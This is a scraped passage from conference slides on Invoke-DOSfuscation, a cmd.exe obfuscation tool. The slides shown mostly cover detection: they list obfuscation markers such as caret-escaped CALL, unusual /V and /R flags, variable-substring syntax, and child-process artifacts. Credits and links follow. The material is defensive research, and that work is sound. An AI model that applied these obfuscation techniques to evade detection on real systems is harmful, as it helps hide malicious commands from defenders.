Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
C:\> Invoke-DOSfuscation Public Release & Live Demo
Detecting DOSfuscation
194
![Page 195: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/195.jpg)
• Please do not use this tool for evil.
• FIN7, FIN8 & APT32: Please do not use this tool at all ☺
195
DISCLAIMER
https://github.com/danielbohannon/Invoke-DOSfuscation
![Page 196: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/196.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Public Release & Live Demo
C:\> Detecting DOSfuscation
196
![Page 197: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/197.jpg)
• Long argument length
• High frequency of obfuscation characters: , ; ^ " ( )
• Rare obfuscation of internal commands:
• C^AL^^L or ;SET,
• Unusual execution flags:
• /V or /R (or /^R)
• Variable substring and replacement syntax:
• %var:~7,1% or !var:~%a,1! or !var:*var=!
197
Detecting DOSfuscation (more details in white paper)
https://moviefiednyc.files.wordpress.com/2013/11/e
0006-ace-ventura-pet-detective-512c7fac5d838.png
![Page 198: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/198.jpg)
• Suspicious sub-command and stdin child process artifacts
• FOR loop executes sub-command via separate cmd.exe invocation
• Cmd.exe pipeline to add'l binary (e.g. findstr.exe) spawns pre-pipe arguments via
separate cmd.exe invocation with these arguments: cmd.exe /S /D /c" set"
198
Detecting DOSfuscation (more details in white paper)
Double whitespace
No space between /c & "
Whitespace after first "
![Page 199: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/199.jpg)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.199
http://smurfitschoolblog.com/wp-content/uploads/2016/10/MissingOutImg_1-900x578.jpg
![Page 200: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/200.jpg)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.200
http://smurfitschoolblog.com/wp-content/uploads/2016/10/MissingOutImg_1-900x578.jpg
Obfuscation
![Page 201: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/201.jpg)
• Invoke-DOSfuscationTestHarness.psm1
THE module I used to develop detection ideas
• Invoke-DosTestHarness
• Get-DosDetectionMatch
• Released 4000 sample obfuscated commands as
.txt & .evtx files for static and dynamic purposes
201
Detecting DOSfuscation – Test Harness FTW!
![Page 202: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/202.jpg)
• Attackers are using more creative command argument obfuscation techniques
• Cmd.exe supports significant obfuscation and encoding capabilities not yet
seen in the wild
• Defenders must match levels of attacker creativity with detection creativity
202
Black Hat Sound Bytes
![Page 203: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/203.jpg)
• FireEye Advanced Practices Team
• Nick Carr, Matthew Dunwoody, Ben Withnell
• My wife: Paige
• 9 months research & hunting (500+ hours)
• 320 hours Invoke-DOSfuscation tool development
• 100 hours slide/presentation development & 100 hours white paper
203
Credit Where Credit Is Due
![Page 204: Invoke-DOSfuscation€¦ · · 2018-03-23• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document • Process-level environment variables + cmd.exe StdIn](https://reader034.vdocument.in/reader034/viewer/2022051802/5af9ff407f8b9ad2208e9f38/html5/thumbnails/204.jpg)
• Daniel Bohannon
• Twitter :: @danielhbohannon
• Blog :: http://danielbohannon.com
• Code: https://github.com/danielbohannon/Invoke-DOSfuscation
• White paper: https://www.fireeye.com/blog/threat-
research/2018/03/dosfuscation-exploring-obfuscation-and-detection-
techniques.html
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.204
Thanks! Questions?